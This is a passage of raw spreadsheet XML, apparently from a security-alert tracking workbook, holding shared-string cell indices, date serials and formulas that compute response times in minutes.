      <c r="AC1856" s="23"/>
      <c r="AD1856" s="23" t="s">
        <v>8437</v>
      </c>
      <c r="AE1856" s="23" t="s">
        <v>8438</v>
      </c>
      <c r="AF1856" s="23"/>
      <c r="AG1856" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH1856" s="24">
        <v>45871.5828935185</v>
      </c>
      <c r="AI1856" s="23"/>
      <c r="AJ1856" s="23"/>
      <c r="AK1856" s="23" t="s">
        <v>11522</v>
      </c>
      <c r="AL1856" s="23" t="s">
        <v>4331</v>
      </c>
      <c r="AM1856" s="23" t="s">
        <v>8487</v>
      </c>
      <c r="AN1856" s="23"/>
      <c r="AO1856" s="23"/>
      <c r="AP1856" s="23" t="s">
        <v>8664</v>
      </c>
      <c r="AQ1856" s="24">
        <v>45871.593287037</v>
      </c>
      <c r="AR1856" s="23" t="s">
        <v>8398</v>
      </c>
      <c r="AS1856" s="23"/>
      <c r="AT1856" s="23"/>
      <c r="AU1856" s="23"/>
    </row>
    <row r="1857" s="1" customFormat="1" spans="1:47">
      <c r="A1857" s="23" t="s">
        <v>11357</v>
      </c>
      <c r="B1857" s="23" t="s">
        <v>8400</v>
      </c>
      <c r="C1857" s="23" t="s">
        <v>11517</v>
      </c>
      <c r="D1857" s="23" t="s">
        <v>11359</v>
      </c>
      <c r="E1857" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1857" s="23" t="s">
        <v>11523</v>
      </c>
      <c r="G1857" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1857" s="23"/>
      <c r="I1857" s="23" t="s">
        <v>8479</v>
      </c>
      <c r="J1857" s="23" t="s">
        <v>11519</v>
      </c>
      <c r="K1857" s="23" t="s">
        <v>8431</v>
      </c>
      <c r="L1857" s="24">
        <v>45870.6060532407</v>
      </c>
      <c r="M1857" s="24">
        <v>45870.6298148148</v>
      </c>
      <c r="N1857" s="23" t="s">
        <v>8712</v>
      </c>
      <c r="O1857" s="23" t="s">
        <v>11524</v>
      </c>
      <c r="P1857" s="23" t="s">
        <v>8400</v>
      </c>
      <c r="Q1857" s="23"/>
      <c r="R1857" s="23" t="s">
        <v>11517</v>
      </c>
      <c r="S1857" s="23" t="s">
        <v>11521</v>
      </c>
      <c r="T1857" s="23" t="s">
        <v>8434</v>
      </c>
      <c r="U1857" s="23" t="s">
        <v>11364</v>
      </c>
      <c r="V1857" s="23" t="s">
        <v>370</v>
      </c>
      <c r="W1857" s="23" t="s">
        <v>8460</v>
      </c>
      <c r="X1857" s="23" t="s">
        <v>9079</v>
      </c>
      <c r="Y1857" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1857" s="24">
        <v>45870.6352546296</v>
      </c>
      <c r="AA1857" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1857" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1857" s="23"/>
      <c r="AD1857" s="23" t="s">
        <v>8437</v>
      </c>
      <c r="AE1857" s="23" t="s">
        <v>8438</v>
      </c>
      <c r="AF1857" s="23"/>
      <c r="AG1857" s="25" t="s">
        <v>8425</v>
      </c>
      <c r="AH1857" s="24">
        <v>45870.6352893518</v>
      </c>
      <c r="AI1857" s="23"/>
      <c r="AJ1857" s="23"/>
      <c r="AK1857" s="23" t="s">
        <v>11525</v>
      </c>
      <c r="AL1857" s="23" t="s">
        <v>4331</v>
      </c>
      <c r="AM1857" s="23" t="s">
        <v>8487</v>
      </c>
      <c r="AN1857" s="23"/>
      <c r="AO1857" s="23"/>
      <c r="AP1857" s="23" t="s">
        <v>8664</v>
      </c>
      <c r="AQ1857" s="24">
        <v>45870.6456712963</v>
      </c>
      <c r="AR1857" s="23" t="s">
        <v>8398</v>
      </c>
      <c r="AS1857" s="23"/>
      <c r="AT1857" s="23"/>
      <c r="AU1857" s="23"/>
    </row>
    <row r="1858" s="1" customFormat="1" spans="1:47">
      <c r="A1858" s="23" t="s">
        <v>11357</v>
      </c>
      <c r="B1858" s="23" t="s">
        <v>8400</v>
      </c>
      <c r="C1858" s="23" t="s">
        <v>11517</v>
      </c>
      <c r="D1858" s="23" t="s">
        <v>11359</v>
      </c>
      <c r="E1858" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1858" s="23" t="s">
        <v>11526</v>
      </c>
      <c r="G1858" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1858" s="23"/>
      <c r="I1858" s="23" t="s">
        <v>8479</v>
      </c>
      <c r="J1858" s="23" t="s">
        <v>11519</v>
      </c>
      <c r="K1858" s="23" t="s">
        <v>8431</v>
      </c>
      <c r="L1858" s="24">
        <v>45870.6060532407</v>
      </c>
      <c r="M1858" s="24">
        <v>45870.6168171296</v>
      </c>
      <c r="N1858" s="23" t="s">
        <v>8536</v>
      </c>
      <c r="O1858" s="23" t="s">
        <v>11527</v>
      </c>
      <c r="P1858" s="23" t="s">
        <v>8400</v>
      </c>
      <c r="Q1858" s="23"/>
      <c r="R1858" s="23" t="s">
        <v>11517</v>
      </c>
      <c r="S1858" s="23" t="s">
        <v>11521</v>
      </c>
      <c r="T1858" s="23" t="s">
        <v>8434</v>
      </c>
      <c r="U1858" s="23" t="s">
        <v>11364</v>
      </c>
      <c r="V1858" s="23" t="s">
        <v>370</v>
      </c>
      <c r="W1858" s="23" t="s">
        <v>8460</v>
      </c>
      <c r="X1858" s="23" t="s">
        <v>9079</v>
      </c>
      <c r="Y1858" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1858" s="24">
        <v>45870.6107986111</v>
      </c>
      <c r="AA1858" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1858" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1858" s="23"/>
      <c r="AD1858" s="23" t="s">
        <v>8437</v>
      </c>
      <c r="AE1858" s="23" t="s">
        <v>8438</v>
      </c>
      <c r="AF1858" s="23"/>
      <c r="AG1858" s="25" t="s">
        <v>8425</v>
      </c>
      <c r="AH1858" s="24">
        <v>45870.6108333333</v>
      </c>
      <c r="AI1858" s="23"/>
      <c r="AJ1858" s="23"/>
      <c r="AK1858" s="23" t="s">
        <v>11528</v>
      </c>
      <c r="AL1858" s="23" t="s">
        <v>4331</v>
      </c>
      <c r="AM1858" s="23" t="s">
        <v>8487</v>
      </c>
      <c r="AN1858" s="23"/>
      <c r="AO1858" s="23"/>
      <c r="AP1858" s="23" t="s">
        <v>8664</v>
      </c>
      <c r="AQ1858" s="24">
        <v>45870.6212152778</v>
      </c>
      <c r="AR1858" s="23" t="s">
        <v>8398</v>
      </c>
      <c r="AS1858" s="23"/>
      <c r="AT1858" s="23"/>
      <c r="AU1858" s="23"/>
    </row>
  </sheetData>
  <autoFilter xmlns:etc="http://www.wps.cn/officeDocument/2017/etCustomData" ref="A1:AU1858"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D193"/>
  <sheetViews>
    <sheetView zoomScale="110" zoomScaleNormal="110" workbookViewId="0">
      <selection activeCell="E146" sqref="E146"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="14.4"/>
  <cols>
    <col min="1" max="1" width="11.75" customWidth="1"/>
    <col min="2" max="2" width="16.2314814814815" style="2" customWidth="1"/>
    <col min="3" max="3" width="21.6388888888889" customWidth="1"/>
    <col min="4" max="4" width="52.4074074074074" customWidth="1"/>
    <col min="5" max="5" width="18.5833333333333" customWidth="1"/>
    <col min="6" max="6" width="12.6666666666667" customWidth="1"/>
    <col min="7" max="7" width="13.8981481481481" customWidth="1"/>
    <col min="8" max="9" width="9" customWidth="1"/>
    <col min="10" max="10" width="20.2222222222222" customWidth="1"/>
    <col min="11" max="11" width="11.4444444444444" customWidth="1"/>
    <col min="12" max="12" width="9" customWidth="1"/>
    <col min="13" max="13" width="11.1018518518519" customWidth="1"/>
    <col min="14" max="15" width="9" customWidth="1"/>
    <col min="16" max="16" width="26.7592592592593" customWidth="1"/>
    <col min="17" max="24" width="9" customWidth="1"/>
    <col min="25" max="26" width="10.7777777777778" style="3" customWidth="1"/>
    <col min="27" max="27" width="9" customWidth="1"/>
    <col min="28" max="28" width="11.7777777777778" customWidth="1"/>
    <col min="29" max="29" width="16.0740740740741"/>
    <col min="30" max="30" width="17.5555555555556" style="4" customWidth="1"/>
    <col min="31" max="32" width="16.4444444444444" style="4" customWidth="1"/>
    <col min="33" max="33" width="16.2314814814815" style="4" customWidth="1"/>
    <col min="34" max="34" width="16.4444444444444" style="4" customWidth="1"/>
    <col min="35" max="36" width="10.7777777777778" customWidth="1"/>
    <col min="37" max="41" width="9" customWidth="1"/>
    <col min="42" max="42" width="32.6944444444444" customWidth="1"/>
    <col min="43" max="43" width="23.0185185185185" customWidth="1"/>
    <col min="44" max="44" width="9" customWidth="1"/>
    <col min="45" max="45" width="11.8981481481481" customWidth="1"/>
    <col min="46" max="46" width="13.4444444444444" customWidth="1"/>
    <col min="47" max="47" width="9" customWidth="1"/>
    <col min="48" max="48" width="11.8425925925926" customWidth="1"/>
    <col min="49" max="49" width="10.7777777777778" customWidth="1"/>
    <col min="50" max="50" width="18.6666666666667"/>
    <col min="52" max="56" width="14.0740740740741" style="5"/>
  </cols>
  <sheetData>
    <row r="1" s="1" customFormat="1" ht="24" customHeight="1" spans="1:56">
      <c r="A1" s="6" t="s">
        <v>278</v>
      </c>
      <c r="B1" s="2" t="s">
        <v>11529</v>
      </c>
      <c r="C1" s="7" t="s">
        <v>3641</v>
      </c>
      <c r="D1" s="7" t="s">
        <v>11530</v>
      </c>
      <c r="E1" s="7" t="s">
        <v>8331</v>
      </c>
      <c r="F1" s="7" t="s">
        <v>353</v>
      </c>
      <c r="G1" s="7" t="s">
        <v>8346</v>
      </c>
      <c r="H1" s="7" t="s">
        <v>11531</v>
      </c>
      <c r="I1" s="8" t="s">
        <v>11532</v>
      </c>
      <c r="J1" s="7" t="s">
        <v>8335</v>
      </c>
      <c r="K1" s="7" t="s">
        <v>8336</v>
      </c>
      <c r="L1" s="7" t="s">
        <v>8348</v>
      </c>
      <c r="M1" s="7" t="s">
        <v>11533</v>
      </c>
      <c r="N1" s="7" t="s">
        <v>11534</v>
      </c>
      <c r="O1" s="8" t="s">
        <v>11535</v>
      </c>
      <c r="P1" s="7" t="s">
        <v>11536</v>
      </c>
      <c r="Q1" s="7" t="s">
        <v>3667</v>
      </c>
      <c r="R1" s="7" t="s">
        <v>11537</v>
      </c>
      <c r="S1" s="7" t="s">
        <v>11538</v>
      </c>
      <c r="T1" s="7" t="s">
        <v>8351</v>
      </c>
      <c r="U1" s="7" t="s">
        <v>8352</v>
      </c>
      <c r="V1" s="8" t="s">
        <v>8344</v>
      </c>
      <c r="W1" s="7" t="s">
        <v>11539</v>
      </c>
      <c r="X1" s="7" t="s">
        <v>11540</v>
      </c>
      <c r="Y1" s="7" t="s">
        <v>8343</v>
      </c>
      <c r="Z1" s="7" t="s">
        <v>8350</v>
      </c>
      <c r="AA1" s="7" t="s">
        <v>358</v>
      </c>
      <c r="AB1" s="7" t="s">
        <v>8347</v>
      </c>
      <c r="AC1" s="7" t="s">
        <v>11541</v>
      </c>
      <c r="AD1" s="7" t="s">
        <v>11542</v>
      </c>
      <c r="AE1" s="7" t="s">
        <v>11543</v>
      </c>
      <c r="AF1" s="7" t="s">
        <v>11544</v>
      </c>
      <c r="AG1" s="7" t="s">
        <v>11545</v>
      </c>
      <c r="AH1" s="7" t="s">
        <v>11546</v>
      </c>
      <c r="AI1" s="7" t="s">
        <v>11547</v>
      </c>
      <c r="AJ1" s="7" t="s">
        <v>11548</v>
      </c>
      <c r="AK1" s="7" t="s">
        <v>11549</v>
      </c>
      <c r="AL1" s="7" t="s">
        <v>8338</v>
      </c>
      <c r="AM1" s="7" t="s">
        <v>8353</v>
      </c>
      <c r="AN1" s="7" t="s">
        <v>11550</v>
      </c>
      <c r="AO1" s="7" t="s">
        <v>11551</v>
      </c>
      <c r="AP1" s="7" t="s">
        <v>11552</v>
      </c>
      <c r="AQ1" s="7" t="s">
        <v>11553</v>
      </c>
      <c r="AR1" s="7" t="s">
        <v>11554</v>
      </c>
      <c r="AS1" s="7" t="s">
        <v>11555</v>
      </c>
      <c r="AT1" s="7" t="s">
        <v>11556</v>
      </c>
      <c r="AU1" s="7" t="s">
        <v>11557</v>
      </c>
      <c r="AV1" s="7" t="s">
        <v>11558</v>
      </c>
      <c r="AW1" s="7" t="s">
        <v>11559</v>
      </c>
      <c r="AX1" s="7" t="s">
        <v>11560</v>
      </c>
      <c r="AY1" s="1" t="s">
        <v>11561</v>
      </c>
      <c r="AZ1" s="9" t="s">
        <v>11562</v>
      </c>
      <c r="BA1" s="9" t="s">
        <v>11563</v>
      </c>
      <c r="BB1" s="9" t="s">
        <v>11564</v>
      </c>
      <c r="BC1" s="9" t="s">
        <v>11565</v>
      </c>
      <c r="BD1" s="9" t="s">
        <v>11558</v>
      </c>
    </row>
    <row r="2" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A2" s="1" t="s">
        <v>11566</v>
      </c>
      <c r="B2" s="2">
        <v>45891.3874421296</v>
      </c>
      <c r="C2" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="D2" s="10" t="s">
        <v>10543</v>
      </c>
      <c r="E2" s="10" t="s">
        <v>8551</v>
      </c>
      <c r="F2" s="10" t="s">
        <v>11567</v>
      </c>
      <c r="G2" s="10"/>
      <c r="H2" s="10"/>
      <c r="I2" s="11" t="s">
        <v>11568</v>
      </c>
      <c r="J2" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K2" s="10"/>
      <c r="L2" s="10"/>
      <c r="M2" s="10" t="s">
        <v>11569</v>
      </c>
      <c r="N2" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="O2" s="12" t="s">
        <v>8432</v>
      </c>
      <c r="P2" s="10"/>
      <c r="Q2" s="10"/>
      <c r="R2" s="10"/>
      <c r="S2" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="T2" s="10" t="s">
        <v>8460</v>
      </c>
      <c r="U2" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="V2" s="13" t="s">
        <v>8460</v>
      </c>
      <c r="W2" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="X2" s="10" t="s">
        <v>11570</v>
      </c>
      <c r="Y2" s="10" t="s">
        <v>11445</v>
      </c>
      <c r="Z2" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA2" s="10"/>
      <c r="AB2" s="10"/>
      <c r="AC2" s="14">
        <v>45891.3874537037</v>
      </c>
      <c r="AD2" s="14">
        <v>45891.3841319444</v>
      </c>
      <c r="AE2" s="14"/>
      <c r="AF2" s="14"/>
      <c r="AG2" s="14"/>
      <c r="AH2" s="10"/>
      <c r="AI2" s="10"/>
      <c r="AJ2" s="10"/>
      <c r="AK2" s="10"/>
      <c r="AL2" s="10"/>
      <c r="AM2" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN2" s="10"/>
      <c r="AO2" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="AP2" s="10"/>
      <c r="AQ2" s="10" t="s">
        <v>11571</v>
      </c>
      <c r="AR2" s="10"/>
      <c r="AS2" s="10"/>
      <c r="AT2" s="10"/>
      <c r="AU2" s="10"/>
      <c r="AV2" s="10"/>
      <c r="AW2" s="10"/>
      <c r="AX2" s="14"/>
      <c r="AY2" s="1" t="e">
        <f>VLOOKUP(E2,资产表!C:AG,31,0)</f>
        <v>#N/A</v>
      </c>
      <c r="AZ2" s="9">
        <f>IF(A2&lt;&gt;"最新威胁",ROUND((B2-AD2)*24*60,2),"")</f>
        <v>4.77</v>
      </c>
      <c r="BA2" s="9">
        <f>IF(A2&lt;&gt;"最新威胁",IF(ISBLANK(AX2),IF(ISBLANK(AE2),ROUND((AC2-B2)*24*60,2),ROUND((AE2-B2)*24*60,2)),ROUND((AX2-B2)*24*60,2)),"")</f>
        <v>0.02</v>
      </c>
      <c r="BB2" s="9" t="str">
        <f>IF(A2&lt;&gt;"最新威胁",IF(ISBLANK(AX2),"",ROUND((AX2-B2)*24*60,2)),"")</f>
        <v/>
      </c>
      <c r="BC2" s="9">
        <f>IF(A2&lt;&gt;"最新威胁",IF(ISBLANK(AF2),ROUND((AC2-B2)*24*60,2),ROUND((AF2-B2)*24*60,2)),"")</f>
        <v>0.02</v>
      </c>
      <c r="BD2" s="9">
        <f>IF(A2&lt;&gt;"最新威胁",IF(ISBLANK(AG2),ROUND((AC2-B2)*24*60,2),ROUND((AG2-B2)*24*60,2)),"")</f>
        <v>0.02</v>
      </c>
    </row>
    <row r="3" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A3" s="1" t="s">
        <v>11566</v>
      </c>
      <c r="B3" s="2">
        <v>45905.9721643518</v>
      </c>
      <c r="C3" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="D3" s="10" t="s">
        <v>8544</v>
      </c>
      <c r="E3" s="10" t="s">
        <v>1977</v>
      </c>
      <c r="F3" s="10" t="s">
        <v>11572</v>
      </c>
      <c r="G3" s="10"/>
      <c r="H3" s="10"/>
      <c r="I3" s="11" t="s">
        <v>11568</v>
      </c>
      <c r="J3" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K3" s="10"/>
      <c r="L3" s="10"/>
      <c r="M3" s="10" t="s">
        <v>11573</v>
      </c>
      <c r="N3" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="O3" s="12" t="s">
        <v>8432</v>
      </c>
      <c r="P3" s="10"/>
      <c r="Q3" s="10"/>
      <c r="R3" s="10"/>
      <c r="S3" s="10" t="s">
        <v>8385</v>
      </c>
      <c r="T3" s="10" t="s">
        <v>8460</v>
      </c>
      <c r="U3" s="10" t="s">
        <v>8557</v>
      </c>
      <c r="V3" s="13" t="s">
        <v>8460</v>
      </c>
      <c r="W3" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="X3" s="10" t="s">
        <v>11570</v>
      </c>
      <c r="Y3" s="10" t="s">
        <v>11428</v>
      </c>
      <c r="Z3" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA3" s="10"/>
      <c r="AB3" s="10"/>
      <c r="AC3" s="14">
        <v>45905.9723148148</v>
      </c>
      <c r="AD3" s="14">
        <v>45905.969849537</v>
      </c>
      <c r="AE3" s="14"/>
      <c r="AF3" s="14"/>
      <c r="AG3" s="14"/>
      <c r="AH3" s="10"/>
      <c r="AI3" s="10"/>
      <c r="AJ3" s="10"/>
      <c r="AK3" s="10"/>
      <c r="AL3" s="10"/>
      <c r="AM3" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN3" s="10"/>
      <c r="AO3" s="10" t="s">
        <v>8557</v>
      </c>
      <c r="AP3" s="10"/>
      <c r="AQ3" s="10" t="s">
        <v>11571</v>
      </c>
      <c r="AR3" s="10"/>
      <c r="AS3" s="10"/>
      <c r="AT3" s="10"/>
      <c r="AU3" s="10"/>
      <c r="AV3" s="10"/>
      <c r="AW3" s="10"/>
      <c r="AX3" s="14"/>
      <c r="AY3" s="1" t="str">
        <f>VLOOKUP(E3,资产表!C:AG,31,0)</f>
        <v>内网</v>
      </c>
      <c r="AZ3" s="9">
        <f t="shared" ref="AZ3:AZ34" si="0">IF(A3&lt;&gt;"最新威胁",ROUND((B3-AD3)*24*60,2),"")</f>
        <v>3.33</v>
      </c>
      <c r="BA3" s="9">
        <f t="shared" ref="BA3:BA12" si="1">IF(A3&lt;&gt;"最新威胁",IF(ISBLANK(AX3),IF(ISBLANK(AE3),ROUND((AC3-B3)*24*60,2),ROUND((AE3-B3)*24*60,2)),ROUND((AX3-B3)*24*60,2)),"")</f>
        <v>0.22</v>
      </c>
      <c r="BB3" s="9" t="str">
        <f t="shared" ref="BB3:BB34" si="2">IF(A3&lt;&gt;"最新威胁",IF(ISBLANK(AX3),"",ROUND((AX3-B3)*24*60,2)),"")</f>
        <v/>
      </c>
      <c r="BC3" s="9">
        <f t="shared" ref="BC3:BC34" si="3">IF(A3&lt;&gt;"最新威胁",IF(ISBLANK(AF3),ROUND((AC3-B3)*24*60,2),ROUND((AF3-B3)*24*60,2)),"")</f>
        <v>0.22</v>
      </c>
      <c r="BD3" s="9">
        <f t="shared" ref="BD3:BD34" si="4">IF(A3&lt;&gt;"最新威胁",IF(ISBLANK(AG3),ROUND((AC3-B3)*24*60,2),ROUND((AG3-B3)*24*60,2)),"")</f>
        <v>0.22</v>
      </c>
    </row>
    <row r="4" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A4" s="1" t="s">
        <v>11566</v>
      </c>
      <c r="B4" s="2">
        <v>45905.9797106481</v>
      </c>
      <c r="C4" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="D4" s="10" t="s">
        <v>8544</v>
      </c>
      <c r="E4" s="10" t="s">
        <v>8551</v>
      </c>
      <c r="F4" s="10" t="s">
        <v>11574</v>
      </c>
      <c r="G4" s="10"/>
      <c r="H4" s="10"/>
      <c r="I4" s="11" t="s">
        <v>11568</v>
      </c>
      <c r="J4" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K4" s="10"/>
      <c r="L4" s="10"/>
      <c r="M4" s="10" t="s">
        <v>11573</v>
      </c>
      <c r="N4" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="O4" s="15" t="s">
        <v>8432</v>
      </c>
      <c r="P4" s="10"/>
      <c r="Q4" s="10"/>
      <c r="R4" s="10"/>
      <c r="S4" s="10" t="s">
        <v>8385</v>
      </c>
      <c r="T4" s="10" t="s">
        <v>8460</v>
      </c>
      <c r="U4" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="V4" s="15" t="s">
        <v>8460</v>
      </c>
      <c r="W4" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="X4" s="10" t="s">
        <v>11570</v>
      </c>
      <c r="Y4" s="10" t="s">
        <v>11425</v>
      </c>
      <c r="Z4" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA4" s="10"/>
      <c r="AB4" s="10"/>
      <c r="AC4" s="14">
        <v>45905.9799074074</v>
      </c>
      <c r="AD4" s="14">
        <v>45905.9766666667</v>
      </c>
      <c r="AE4" s="14"/>
      <c r="AF4" s="14"/>
      <c r="AG4" s="14"/>
      <c r="AH4" s="10"/>
      <c r="AI4" s="10"/>
      <c r="AJ4" s="10"/>
      <c r="AK4" s="10"/>
      <c r="AL4" s="10"/>
      <c r="AM4" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN4" s="10"/>
      <c r="AO4" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="AP4" s="10"/>
      <c r="AQ4" s="10" t="s">
        <v>11571</v>
      </c>
      <c r="AR4" s="10"/>
      <c r="AS4" s="10"/>
      <c r="AT4" s="10"/>
      <c r="AU4" s="10"/>
      <c r="AV4" s="10"/>
      <c r="AW4" s="10"/>
      <c r="AX4" s="14"/>
      <c r="AY4" s="1" t="e">
        <f>VLOOKUP(E4,资产表!C:AG,31,0)</f>
        <v>#N/A</v>
      </c>
      <c r="AZ4" s="9">
        <f t="shared" si="0"/>
        <v>4.38</v>
      </c>
      <c r="BA4" s="9">
        <f t="shared" si="1"/>
        <v>0.28</v>
      </c>
      <c r="BB4" s="9" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="BC4" s="9">
        <f t="shared" si="3"/>
        <v>0.28</v>
      </c>
      <c r="BD4" s="9">
        <f t="shared" si="4"/>
        <v>0.28</v>
      </c>
    </row>
    <row r="5" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A5" s="1" t="s">
        <v>11566</v>
      </c>
      <c r="B5" s="2">
        <v>45905.9826388889</v>
      </c>
      <c r="C5" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="D5" s="10" t="s">
        <v>8544</v>
      </c>
      <c r="E5" s="10" t="s">
        <v>8551</v>
      </c>
      <c r="F5" s="10" t="s">
        <v>11575</v>
      </c>
      <c r="G5" s="10"/>
      <c r="H5" s="10"/>
      <c r="I5" s="11" t="s">
        <v>11568</v>
      </c>
      <c r="J5" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K5" s="10"/>
      <c r="L5" s="10"/>
      <c r="M5" s="10" t="s">
        <v>11573</v>
      </c>
      <c r="N5" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="O5" s="15" t="s">
        <v>8432</v>
      </c>
      <c r="P5" s="10"/>
      <c r="Q5" s="10"/>
      <c r="R5" s="10"/>
      <c r="S5" s="10" t="s">
        <v>8385</v>
      </c>
      <c r="T5" s="10" t="s">
        <v>8460</v>
      </c>
      <c r="U5" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="V5" s="15" t="s">
        <v>8460</v>
      </c>
      <c r="W5" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="X5" s="10" t="s">
        <v>11570</v>
      </c>
      <c r="Y5" s="10" t="s">
        <v>11418</v>
      </c>
      <c r="Z5" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA5" s="10"/>
      <c r="AB5" s="10"/>
      <c r="AC5" s="14">
        <v>45905.9827314815</v>
      </c>
      <c r="AD5" s="14">
        <v>45905.9802777778</v>
      </c>
      <c r="AE5" s="14"/>
      <c r="AF5" s="14"/>
      <c r="AG5" s="14"/>
      <c r="AH5" s="10"/>
      <c r="AI5" s="10"/>
      <c r="AJ5" s="10"/>
      <c r="AK5" s="10"/>
      <c r="AL5" s="10"/>
      <c r="AM5" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN5" s="10"/>
      <c r="AO5" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="AP5" s="10"/>
      <c r="AQ5" s="10" t="s">
        <v>11571</v>
      </c>
      <c r="AR5" s="10"/>
      <c r="AS5" s="10"/>
      <c r="AT5" s="10"/>
      <c r="AU5" s="10"/>
      <c r="AV5" s="10"/>
      <c r="AW5" s="10"/>
      <c r="AX5" s="10"/>
      <c r="AY5" s="1" t="e">
        <f>VLOOKUP(E5,资产表!C:AG,31,0)</f>
        <v>#N/A</v>
      </c>
      <c r="AZ5" s="9">
        <f t="shared" si="0"/>
        <v>3.4</v>
      </c>
      <c r="BA5" s="9">
        <f t="shared" si="1"/>
        <v>0.13</v>
      </c>
      <c r="BB5" s="9" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="BC5" s="9">
        <f t="shared" si="3"/>
        <v>0.13</v>
      </c>
      <c r="BD5" s="9">
        <f t="shared" si="4"/>
        <v>0.13</v>
      </c>
    </row>
    <row r="6" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A6" s="1" t="s">
        <v>11566</v>
      </c>
      <c r="B6" s="2">
        <v>45905.9901388889</v>
      </c>
      <c r="C6" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="D6" s="10" t="s">
        <v>8544</v>
      </c>
      <c r="E6" s="10" t="s">
        <v>8551</v>
      </c>
      <c r="F6" s="10" t="s">
        <v>11576</v>
      </c>
      <c r="G6" s="10"/>
      <c r="H6" s="10"/>
      <c r="I6" s="11" t="s">
        <v>11568</v>
      </c>
      <c r="J6" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K6" s="10"/>
      <c r="L6" s="10"/>
      <c r="M6" s="10" t="s">
        <v>11573</v>
      </c>
      <c r="N6" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="O6" s="15" t="s">
        <v>8432</v>
      </c>
      <c r="P6" s="10"/>
      <c r="Q6" s="10"/>
      <c r="R6" s="10"/>
      <c r="S6" s="10" t="s">
        <v>8385</v>
      </c>
      <c r="T6" s="10" t="s">
        <v>8460</v>
      </c>
      <c r="U6" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="V6" s="15" t="s">
        <v>8460</v>
      </c>
      <c r="W6" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="X6" s="10" t="s">
        <v>11570</v>
      </c>
      <c r="Y6" s="10" t="s">
        <v>11422</v>
      </c>
      <c r="Z6" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA6" s="10"/>
      <c r="AB6" s="10"/>
      <c r="AC6" s="14">
        <v>45905.9902314815</v>
      </c>
      <c r="AD6" s="14">
        <v>45905.9870717593</v>
      </c>
      <c r="AE6" s="14"/>
      <c r="AF6" s="14"/>
      <c r="AG6" s="14"/>
      <c r="AH6" s="10"/>
      <c r="AI6" s="10"/>
      <c r="AJ6" s="10"/>
      <c r="AK6" s="10"/>
      <c r="AL6" s="10"/>
      <c r="AM6" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN6" s="10"/>
      <c r="AO6" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="AP6" s="10"/>
      <c r="AQ6" s="10" t="s">
        <v>11571</v>
      </c>
      <c r="AR6" s="10"/>
      <c r="AS6" s="10"/>
      <c r="AT6" s="10"/>
      <c r="AU6" s="10"/>
      <c r="AV6" s="10"/>
      <c r="AW6" s="10"/>
      <c r="AX6" s="10"/>
      <c r="AY6" s="1" t="e">
        <f>VLOOKUP(E6,资产表!C:AG,31,0)</f>
        <v>#N/A</v>
      </c>
      <c r="AZ6" s="9">
        <f t="shared" si="0"/>
        <v>4.42</v>
      </c>
      <c r="BA6" s="9">
        <f t="shared" si="1"/>
        <v>0.13</v>
      </c>
      <c r="BB6" s="9" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="BC6" s="9">
        <f t="shared" si="3"/>
        <v>0.13</v>
      </c>
      <c r="BD6" s="9">
        <f t="shared" si="4"/>
        <v>0.13</v>
      </c>
    </row>
    <row r="7" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A7" s="1" t="s">
        <v>11566</v>
      </c>
      <c r="B7" s="2">
        <v>45905.9902199074</v>
      </c>
      <c r="C7" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="D7" s="10" t="s">
        <v>8544</v>
      </c>
      <c r="E7" s="10" t="s">
        <v>8551</v>
      </c>
